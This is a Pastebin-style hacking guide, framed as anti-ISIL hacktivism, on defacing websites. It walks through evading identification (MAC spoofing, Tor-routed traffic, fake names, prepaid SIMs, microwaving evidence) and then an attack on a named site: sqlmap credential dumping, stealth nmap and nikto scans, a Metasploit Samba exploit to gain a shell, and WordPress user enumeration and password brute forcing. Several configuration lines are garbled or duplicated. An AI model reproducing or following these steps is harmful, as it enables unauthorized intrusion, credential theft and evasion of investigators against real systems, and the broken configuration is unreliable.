Guest User

Untitled

a guest
Jun 26th, 2017
374
0
Never
Not a member of Pastebin yet? Sign Up, it unlocks many cool features!
text 17.51 KB | None | 0 0
  1. `.:/+oyh:
  2.  
  3. `:/oyhmNNNMMMMMM-
  4.  
  5. yNNMMMMMMMMMMMMMy
  6.  
  7. .MMMMMMMMMMMMMMMN.
  8.  
  9. /MMMMMMMMMMMMMMMh
  10.  
  11. +MMMMMMMMMMMMMMMo
  12.  
  13. oMMMMMMMMMMMMMMMh .:+syhhhhhys/.
  14.  
  15. sMMMMMMMMMMMMMMMM+. `:oyys+/--.....-/o+.
  16.  
  17. sMMMMMMMMdsooosyhdhyo:` .+s/-` `..-------..``.`
  18.  
  19. oMMMMMMMMhyyyyyysso++oso:` .. `-+ydmNNNNNmmmddho-
  20.  
  21. oMMMMMMmsssyhdmNMMMMmho//+. `:ymNMMMmdyo/--....-/o+.
  22.  
  23. +MMMMMM- .-/ydNMMMNd: `dMMMmds:. `-`
  24.  
  25. /MMMMMM+ `-odMMMm `hhso+.`
  26.  
  27. /MMMMMMm` `/dMN- `/o-
  28.  
  29. -MMMMMMMh` ` `hMNo` +s` `:.
  30.  
  31. .MMMMMMMMhssssssso+/-/ysoMMMd` . `:/oosssssso+--+hm-
  32.  
  33. `MMMMdssyhmNNNNNNNNmh/hMMMMMMs odmNNNNNNNNdhsoymh-
  34.  
  35. NMM+ `.....`:+:yMMMMMMd `.....` `+/`
  36.  
  37. mMd .. sMMMMMMN .
  38.  
  39. dMs `mMMMMMMM
  40.  
  41. yM+ `yMMMMMMMN
  42.  
  43. oM+ .dMMMMMMMMm
  44.  
  45. /M+ `mMMMMMMMMMy
  46.  
  47. -My yMMMMMMMMMM: ``
  48.  
  49. `MN. `/dMMMMMMMMMMm `oy:`
  50.  
  51. mMh//+///+oydy+-..:odMMMMMm. `-:. `/yyso+//+o+/`
  52.  
  53. oMd` .dMMMMy. .+dMMMNo-.:+o+++: ``oNm+mh`
  54.  
  55. `NMs -M/dMm/` `-mMMMNNMMm: `/dMy./N-
  56.  
  57. +MMo hy`sMMmo- .+dMMMMhdMMMNh/` `-omMN+ .ms
  58.  
  59. sMM+ .m+ :hMMNmyoosdNMMMMNo``sMMMMMmhsosymNMNy. .dd`
  60.  
  61. `sMN+ :N+ `-oyddmmNNNNNms. :ydmNNNNmmddy+. .dd.
  62.  
  63. +NMo :mo ```.:/+ossoooooo++oo++/-.``` :my`
  64.  
  65. :mMy`-dy` `````....````` +mo`
  66.  
  67. .hMd-`sd- .yh-
  68.  
  69. `+NN+`/h/ `/sddhyddhs:` :h+`
  70.  
  71. -hNy..so` `sMMNMMs` `+y.
  72.  
  73. `+mm: /s. dMMMm .s/
  74.  
  75. .yNs`.o- .NMMMN. -o.
  76.  
  77. /md-`/: yMMMMMh :/`
  78.  
  79. .sm+`-: mMMMMMN :-
  80.  
  81. :dy..` dMMMMMm ``
  82.  
  83. `+h: +MMMMMs
  84.  
  85. .o- `NMMMM-
  86.  
  87. sMMMy
  88.  
  89. `NMN.
  90.  
  91. :m:
  92.  
  93.  
  94.  
  95.  
  96.  
  97. B1tsh1fter's Legionary Noob guide to Fucking ISIL online.
  98.  
  99. https://www.youtube.com/watch?v=V1fMvLbE85E
  100.  
  101. Vol 1 Website Defacement (Just in time for fuck ISIL friday.)
  102.  
  103. ####################################################################################
  104.  
  105. The term "website defacement" refers to any unauthorized changes made to the appearance of either a single webpage, or an entire site.
  106.  
  107. Website defacement is an attack on a website that changes the visual appearance of the site or a webpage. These are typically the work
  108.  
  109. of system crackers, who break into a web server and replace the hosted website with one of their own.
  110.  
  111. 1337 SETUP not for noobs
  112.  
  113. ####################################################################################
  114.  
  115. Mifi access point.
  116.  
  117. https://www.verizonwireless.com/internet-devices/jetpack-mifi-6620l/ $49.99
  118.  
  119. Prepaid sim cards
  120.  
  121. http://www.ebay.com/sch/Verizon-SIM-Cards/29778/bn_591704/i.html
  122.  
  123. https://www.youtube.com/watch?v=RyzKNMQB3OQ
  124.  
  125. Fake Name generator
  126.  
  127. https://fakena.me/fake-name/
  128.  
  129. DAVIS STANDARD WIRELESS REPEATER SOLAR POWERED $200.00
  130.  
  131. https://jet.com/product/detail/ca20e31f9fb34add9071c2b1d21c7575
  132.  
  133. Turn do not broadcast ssid, just type it in at client.
  134.  
  135. SETUP
  136.  
  137. ####################################################################################
  138.  
  139. Set random mac address first, before connecting to wifi.
  140.  
  141. MAC Address Changer for windoze
  142.  
  143. https://technitium.com/tmac/
  144.  
  145. Download the the lastest version of the Kali linux .iso from a free wifi access point & burn on laptop/computer.
  146.  
  147. https://www.kali.org/downloads/
  148.  
  149. Boot from dvd drive;
  150.  
  151. Install onto 16GB usb drive
  152.  
  153. (warning do not use "USB persistence" this is diffrent, just install on to the USB drive using Kali graphic install.)
  154.  
  155. On This drive;
  156.  
  157. CORSAIR Padlock 2 16GB USB 2.0 Flash Drive AES Hardware-based encryption $29.99
  158.  
  159. http://www.newegg.com/Product/Product.aspx?Item=N82E16820233128
  160.  
  161. Also use LVM encryption in the Kali graphic install options.
  162.  
  163. The OS is now dual, numberpad AES hardware encrypted & password AES LVM encrypted.
  164.  
  165. When the drive is removed it leaves no trace on the computer.
  166.  
  167. Destroy original Kali install disk with by cooking microwave for 3 min,
  168.  
  169. shatter into pieces and dump in unmarked dumpster at least 5 blocks from residence (wear thick rubber gloves).
  170.  
  171. Set BIOS too boot from the USB drive and away we go.
  172.  
  173. IN CASE OF EMERGANCY!!
  174.  
  175. Microwave USB drive for 5 min!! This will destroy the internal NAND chip and all data with it.
  176. Lockdown
  177.  
  178. Kali boots with "root" user enabled by default, this is insecure we must change this.
  179.  
  180. Enter into the following into the terminal;
  181.  
  182. sudo adduser an0n
  183.  
  184. Then enter password, leave info blank.
  185.  
  186. Add user to the sudoers list;
  187.  
  188. Enter into the following into the terminal;
  189.  
  190. sudo usermod -a -G sudo an0n
  191.  
  192. Disable root account,
  193.  
  194. Enter into the following into the terminal;
  195.  
  196. sudo passwd -l root
  197. reboot and login as An0n complete with password.
  198.  
  199.  
  200. sudo apt-get install logwatch
  201. sudo apt-get install rkhunter chkrootkit
  202. In /etc/chkrootkit.conf, change RUN_DAILY to "true" so that it runs regularly, and change "-q" to "" otherwise the output doesn’t make much sense. In /etc/default/rkhunter, change CRON_DAILY_RUN and CRON_DB_UPDATE to "true" so it runs regularly. REPORT_EMAIL="[email protected]"
  203. Add the following lines to /etc/sysctl.d/10-network-security.conf
  204.  
  205. # Ignore ICMP broadcast requests
  206. net.ipv4.icmp_echo_ignore_broadcasts = 1
  207.  
  208. # Disable source packet routing
  209. net.ipv4.conf.all.accept_source_route = 0
  210. net.ipv6.conf.all.accept_source_route = 0
  211. net.ipv4.conf.default.accept_source_route = 0
  212. net.ipv6.conf.default.accept_source_route = 0
  213.  
  214. # Ignore send redirects
  215. net.ipv4.conf.all.send_redirects = 0
  216. net.ipv4.conf.default.send_redirects = 0
  217.  
  218. # Block SYN attacks
  219. net.ipv4.tcp_max_syn_backlog = 2048
  220. net.ipv4.tcp_synack_retries = 2
  221. net.ipv4.tcp_syn_retries = 5
  222.  
  223. # Log Martians
  224. net.ipv4.conf.all.log_martians = 1
  225. net.ipv4.icmp_ignore_bogus_error_responses = 1
  226.  
  227. # Ignore ICMP redirects
  228. net.ipv4.conf.all.accept_redirects = 0
  229. net.ipv6.conf.all.accept_redirects = 0
  230. net.ipv4.conf.default.accept_redirects = 0
  231. net.ipv6.conf.default.accept_redirects = 0
  232.  
  233. # Ignore Directed pings
  234. net.ipv4.icmp_echo_ignore_all = 1
  235.  
  236. Chapter 1 Anonymity or "No shit sherlock":
  237.  
  238. ####################################################################################
  239.  
  240. For this chapter Login too a free wifi access point if possible.
  241.  
  242. Install macchanger,
  243.  
  244. Enter into the following into the terminal;
  245.  
  246. sudo apt-get update && sudo apt-get install macchanger
  247.  
  248.  
  249.  
  250.  
  251.  
  252. sudo apt-get install net-tools
  253.  
  254. ifconfig
  255.  
  256. sudo touch Desktop/MAC.sh && sudo chmod 777 MAC.sh
  257.  
  258.  
  259. sudo nano Desktop/MAC.sh
  260.  
  261.  
  262. !#/bin/bash
  263.  
  264. sudo ifconfig enp2s0 down && sudo macchanger -r enp2s0 && sudo ifconfig enp2s0 up
  265.  
  266. Fuck VPN's they lie, can get compromised and/or subpoena
  267.  
  268. tunnel ALL through tor with the following config:
  269.  
  270. Enter into the following into the terminal;
  271.  
  272. sudo apt-get install tor && sudo apt-get install firehol &&
  273.  
  274. sudo nano /etc/default/firehol
  275.  
  276.  
  277.  
  278. modify the following in the file too START_FIREHOL=YES
  279.  
  280. sudo apt-get install tor
  281.  
  282. TOR config
  283.  
  284. edit the following to
  285.  
  286. sudo nano /etc/tor/torrc
  287.  
  288.  
  289.  
  290. Very Important!!: Must run the following command on each boot without fail;
  291.  
  292. sudo ifconfig eth0 down && sudo macchanger -r eth0 && sudo ifconfig eth0 up
  293.  
  294. Fuck VPN's they lie, can get compromised and/or subpoena
  295.  
  296. tunnel ALL through tor with the following config:
  297.  
  298. Enter into the following into the terminal;
  299.  
  300. sudo apt-get install tor && sudo apt-get install firehol &&
  301.  
  302. sudo nano /etc/default/firehol
  303.  
  304.  
  305.  
  306. modify the following in the file too START_FIREHOL=YES
  307. sudo apt-get install tor
  308.  
  309. TOR config
  310.  
  311. edit the following to
  312.  
  313. sudo nano /etc/tor/torrc
  314.  
  315. to this:
  316.  
  317. ####start below here####
  318.  
  319. VirtualAddrNetworkIPv4 10.192.0.0/10
  320.  
  321. AutomapHostsOnResolve 1
  322.  
  323. TransPort 9040
  324.  
  325. DNSPort 53
  326.  
  327. FascistFirewall 1
  328.  
  329. FirewallPorts 443
  330.  
  331. DataDirectory /var/lib/tor
  332.  
  333. PidFile /var/run/tor/tor.pid
  334.  
  335. User debian-tor
  336.  
  337. ClientOnly
  338. strictnodes 1
  339.  
  340. ExitNodes {us}
  341.  
  342. ####end above here#####
  343.  
  344. Firehol config
  345.  
  346. sudo nano /etc/firehol/firehol.conf
  347.  
  348. to this:
  349.  
  350. ####start below here####
  351.  
  352. version 5
  353.  
  354. server_tor_ports="tcp/9050 tcp/9051"
  355.  
  356. client_tor_ports="default"
  357.  
  358. server_proxy_ports="tcp/9040"
  359.  
  360. lient_tor_ports="default"
  361.  
  362. server_proxy_ports="tcp/9040"
  363.  
  364. client_proxy_ports="default"
  365.  
  366. server_polipo_ports="tcp/8118"
  367.  
  368. client_polipo_ports="default"
  369.  
  370. server_dns_ports="udp/53"
  371.  
  372. client_dns_ports="default"
  373.  
  374. #all incoming DNS goes to port 53 or whatever your torrc's DNSPort is
  375.  
  376. #for local redirection make sure your /etc/resolv.conf reads 'nameserver #127.0.0.1
  377.  
  378. redirect to 53 inface eth+ proto udp src 192.168.0.0/16 dst not 127.0.0.1 dport 53
  379.  
  380. #add to force all incoming tcp traffic to 9040
  381.  
  382. #for some reason this will redirect locally generated tcp traffic too
  383.  
  384. transparent_proxy "1:65535" 9040 debian-tor inface eth+ user not debian-tor dst not "$UNROUTABLE_IPS"
  385.  
  386. interface eth0 dhcp
  387.  
  388. policy return
  389.  
  390. client dhcp accept
  391.  
  392. client all accept
  393.  
  394. #allow only outgoing TOR traffic
  395.  
  396. interface eth0 internet src not "$UNROUTABLE_IPS"
  397.  
  398. client all accept user debian-tor
  399.  
  400.  
  401.  
  402. #add for local DNS and proxy access
  403.  
  404. interface "eth0 lo" local src "192.168.1.2 127.0.0.1" dst "192.168.1.2 127.0.0.1"
  405.  
  406. server dns accept
  407.  
  408. server privoxy accept
  409.  
  410. server tor accept
  411.  
  412. server proxy accept
  413.  
  414.  
  415.  
  416. #add for local TOR socks and control port access
  417.  
  418. interface lo internal src 127.0.0.1 dst 127.0.0.1
  419.  
  420. server tor accept
  421.  
  422. server proxy accept
  423.  
  424. ####end above here#####
  425.  
  426. Remove icewesel and install firefox
  427.  
  428. Enter the following into the terminal;
  429.  
  430. apt-get remove iceweasel &&
  431.  
  432. echo -e “ndeb http://downloads.sourceforge.net/project/ubuntuzilla/mozilla/apt all main” | tee -a /etc/apt/sources.list > /dev/null &&
  433.  
  434. apt-key adv --recv-keys --keyserver keyserver.ubuntu.com C1289A29 &&
  435.  
  436. apt-get update &&
  437.  
  438. apt-get install firefox-mozilla-build
  439.  
  440. Firefox plugins to install;
  441.  
  442. https://addons.mozilla.org/en-US/firefox/addon/cookie-whitelist-with-buttons/
  443.  
  444. https://addons.mozilla.org/en-US/firefox/addon/sslpersonas/
  445.  
  446. https://addons.mozilla.org/en-US/firefox/addon/ghostery/
  447.  
  448. https://addons.mozilla.org/en-US/firefox/addon/smart-https/
  449.  
  450. https://addons.mozilla.org/en-US/firefox/addon/noscript/
  451.  
  452. https://addons.mozilla.org/en-US/firefox/addon/random-agent-spoofer/
  453.  
  454. https://addons.mozilla.org/en-US/firefox/addon/adblock-plus/
  455.  
  456. https://addons.mozilla.org/en-US/firefox/addon/foxyproxy-standard/
  457.  
  458. configure foxyproxy to use tor at 127.0.0.1 9050 socks 4a
  459.  
  460. Install proxychains to stay stealth
  461.  
  462. Enter the following into the terminal;
  463.  
  464. sudo apt-get install proxychains
  465.  
  466. Chapter 2 Target Acquired or "How 1337 am I?"
  467.  
  468. ####################################################################################
  469.  
  470. Enter the following into the terminal;
  471.  
  472. sudo proxychains nslookup www.Jihadist.ps
  473.  
  474. ####output start####
  475.  
  476. Server: 8.8.8.8
  477.  
  478. Address: 8.8.8.8#53
  479.  
  480. Non-authoritative answer:
  481.  
  482. www.Jihadist.ps canonical name = Jihadist.ps.
  483.  
  484. Name: Jihadist.ps
  485.  
  486. Address: 104.28.##.105
  487.  
  488. Name: Jihadist.ps
  489.  
  490. Address: 104.28.##.105
  491.  
  492. ####output end####
  493.  
  494. run sqlmap over tor with random user agent at target page for usernames and passwords;
  495.  
  496. Enter the following into the terminal;
  497.  
  498. sudo sqlmap --tor --random-agent -a --url=http://forums.Jihadist.ps
  499.  
  500. run nmap in a separate terminal while we wait for the results
  501.  
  502. Scan the ip with nmap + proxychains to route it over tor
  503.  
  504. set to zero ping "-Pn" to avoid detection The
  505.  
  506. -Ss option tells nmap to perform a stealth scan, the -A option tells it to try to discover OS;
  507.  
  508. Enter the following into the terminal;
  509.  
  510. sudo proxychains nmap -v -Pn -Ss -T4 -A -p 1-65535 104.28.##.105
  511.  
  512. Scan the site with nikto + proxychains to route it over tor;
  513.  
  514. Enter the following into the terminal;
  515.  
  516. sudo proxychains nikto -h www.Jihadist.ps && proxychains nikto -h 104.28.##.105
  517.  
  518. Scan the site with uniscan + proxychains to route it over tor;
  519.  
  520. Enter the following into the terminal;
  521.  
  522. sudo proxychains ./uniscan -u https://www.Jihadist.ps/
  523.  
  524. The following info should have been obtained with the help of the tor cloaked scanning
  525.  
  526. Target ip (from nslookup) 104.28.##.105
  527.  
  528. Target OS and Version from nmap.
  529.  
  530. kick it oldschool by googling "OS version Exploit Metasploit" to check for any quick exploit modules in Metasploit.
  531.  
  532. We need to find out the OS and ports and services running on the target system.
  533.  
  534. EXAMPLE;
  535.  
  536. Once you find the open ports and service like a samba port its party time.
  537.  
  538. Fire up Metasploit!
  539.  
  540. Enter the following into the terminal;
  541.  
  542. msfconsole
  543.  
  544. Enter the follow into the Metasploit framework console;
  545.  
  546. msf >set Proxies socks5:127.0.0.1:9050
  547.  
  548. We need to find the version of samba..
  549.  
  550. Enter each into the follow into the Metasploit framework console;
  551.  
  552. msf > use auxiliary/scanner/smb/smb_version
  553.  
  554. msf auxiliary(smb_version) >set RHOST 104.28.##.105
  555.  
  556. RHOST => 104.28.##.105
  557.  
  558. msfauxiliary(smb_version) >set RPORT 445
  559.  
  560. RPORT => 445
  561.  
  562. msfauxiliary(smb_version) >exploit
  563.  
  564. With version in hand, restart msfconsole now we use the appropriate module...
  565.  
  566. msfconsole
  567.  
  568. msf >set Proxies socks5:127.0.0.1:9050
  569.  
  570. msf >use exploit/multi/samba/usermap_script
  571.  
  572. msf exploit(usermap_script) > set RHOST 104.28.##.105
  573.  
  574. msf exploit(usermap_script) >exploit
  575.  
  576. We now have a command shell on the target box!
  577.  
  578. Chapter 3 Other methods of infiltration or "Boba fett is dead!"
  579.  
  580. ####################################################################################
  581.  
  582. If using Wordpress; (Credit to Dr Chaos);
  583.  
  584. wpscan –-url wordpress_url
  585.  
  586. You should be able to quickly determine the WordPress version, which plugins are installed, and what theme is active when you open the scanner.
  587.  
  588. The first thing we will do is look for lines beginning with a red plus (+). These are the known WordPress vulnerabilities.
  589.  
  590. If the correct vulnerability exists, you can enumerate a user list from WordPress with the following command:
  591.  
  592. wpscan –-url wordpress_url –-enumerate u
  593.  
  594. Once user names have been collected, you then can attempt to brute force crack the associated passwords.
  595.  
  596. You can also download our custom word list from here: /usr/share/wordlists
  597.  
  598. WARNING: DO A SAVE AS OR YOUR BROWSER MAY CRASH
  599.  
  600. wget http://www.drchaos.com/public_files/chaos-dictionary.lst.txt
  601.  
  602. Brute force the following command:
  603.  
  604. wpscan –-url [wordpress_url] –-word list [path_to_world list] –-username [username to bruteforce] –threads [number of threads]
  605.  
  606. The result? If you are lucky, you can see WPScan was able to crack the password.
  607.  
  608. To be continued...
  609.  
  610. What does the Fawkes say?
Advertisement
Add Comment
Please, Sign In to add comment